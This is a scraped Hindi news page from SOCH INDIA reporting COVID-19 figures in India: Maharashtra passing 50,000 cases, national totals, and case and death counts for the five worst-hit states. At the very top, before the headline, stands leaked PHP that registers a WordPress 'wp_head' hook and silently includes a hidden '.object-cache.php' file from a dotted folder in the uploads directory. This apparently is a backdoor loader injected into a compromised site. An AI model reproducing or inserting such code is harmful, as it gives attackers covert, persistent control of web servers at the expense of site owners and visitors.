add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); महाराष्ट्र में 50 हजार केस पार, जानें टॉप 5 प्रभावित राज्यों में क्या है हाल – SOCH INDIA
Menu

देश
महाराष्ट्र में 50 हजार केस पार, जानें टॉप 5 प्रभावित राज्यों में क्या है हाल

nobanner

देश में कोरोना वायरस के मामले लगातार तेज़ी से बढ़ रहे हैं, बीते कुछ दिनों में लगातार नए मामलों का रिकॉर्ड टूट रहा है. कुल मामलों की संख्या एक लाख 38 हजार का आंकड़ा पार कर चुकी है, तो वहीं मौत का आंकड़ा भी चार हजार को पार कर गया है. देश में महाराष्ट्र ऐसा राज्य है, जहां सबसे अधिक केस हैं.

महाराष्ट्र में सोमवार सुबह तक 50 हजार से अधिक केस रिपोर्ट हो चुके हैं, जबकि कुल मौतों की संख्या 1635 है. इनमें से सिर्फ मुंबई में ही 30 हजार केस और लगभग एक हज़ार मौतें हुई हैं. महाराष्ट्र में बीते दिन 3 हजार से अधिक मामले सामने आए थे, तो वहीं पचास से अधिक लोगों की जान गई थी.

महाराष्ट्र के बाद देश में गुजरात, तमिलनाडु और दिल्ली ऐसे राज्य हैं जहां कोरोना वायरस के केस ने रफ्तार पकड़ी है.

क्या है टॉप पांच राज्यों का हाल…

महाराष्ट्र: 50231 केस, 1635 मौत

तमिलनाडु: 16277 केस, 111 मौत

गुजरात: 14056 केस, 858 मौत

दिल्ली: 13418 केस, 261 मौत

राजस्थान: 7028 केस, 163 मौत